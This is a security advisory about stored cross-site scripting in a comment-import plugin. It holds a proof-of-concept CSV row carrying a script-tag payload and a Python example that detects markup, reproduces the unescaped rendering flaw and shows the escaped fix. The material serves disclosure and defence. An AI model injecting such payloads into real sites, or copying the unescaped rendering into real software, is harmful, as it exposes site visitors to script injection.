The plugin does not sanitise and escape imported comments, which could allow high-privilege users to import malicious ones (either intentionally or not) and lead to Stored Cross-Site Scripting issues.
Import the following CSV (as comments):
comment_post_ID,comment_author,comment_content,comment_rating,comment_approved,user_id
1,admin,malicious<script>alert(/XSS/)</script>,5,1,admin
The XSS will then be triggered in the post the comment was imported into (comment_post_ID).
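The following is an added example, not the plugin's code: it parses the advisory's CSV the way an import routine would, flags rows whose text fields carry HTML before anything is stored, and shows the unescaped rendering that produces the stored XSS beside an output-escaped version that neutralises it. The field names come from the CSV header above; the benign second row is constructed.

```python
import csv
import html
import io
import re

# Constructed sample: the advisory's CSV plus one benign row, embedded as test input.
SAMPLE_CSV = (
    "comment_post_ID,comment_author,comment_content,comment_rating,comment_approved,user_id\n"
    "1,admin,malicious<script>alert(/XSS/)</script>,5,1,admin\n"
    "2,reader,Great post!,4,1,reader\n"
)

# Free-text fields that end up in HTML; the numeric/flag fields are validated elsewhere.
TEXT_FIELDS = ("comment_author", "comment_content")
TAG_RE = re.compile(r"<[^>]+>")


def load_rows(csv_text):
    """Parse the import file into dicts keyed by the header row (no filtering yet)."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def find_markup(rows):
    """Pre-import check: (comment_post_ID, field) for every text field containing a tag."""
    return [
        (row["comment_post_ID"], field)
        for row in rows
        for field in TEXT_FIELDS
        if TAG_RE.search(row.get(field, ""))
    ]


def render_unsafe(row):
    """Mirrors the flaw: stored values are concatenated straight into the page."""
    return "<p><b>{}</b>: {}</p>".format(row["comment_author"], row["comment_content"])


def render_escaped(row):
    """Hardened: HTML-escape every stored value at output time, so imported markup is inert."""
    return "<p><b>{}</b>: {}</p>".format(
        html.escape(row["comment_author"], quote=True),
        html.escape(row["comment_content"], quote=True),
    )


if __name__ == "__main__":
    rows = load_rows(SAMPLE_CSV)
    print("rows with markup:", find_markup(rows))
    for row in rows:
        print(render_escaped(row))
```

Flagging at import time catches the malicious row before it is stored; escaping at render time is the control that still holds for comments that were imported before the fix.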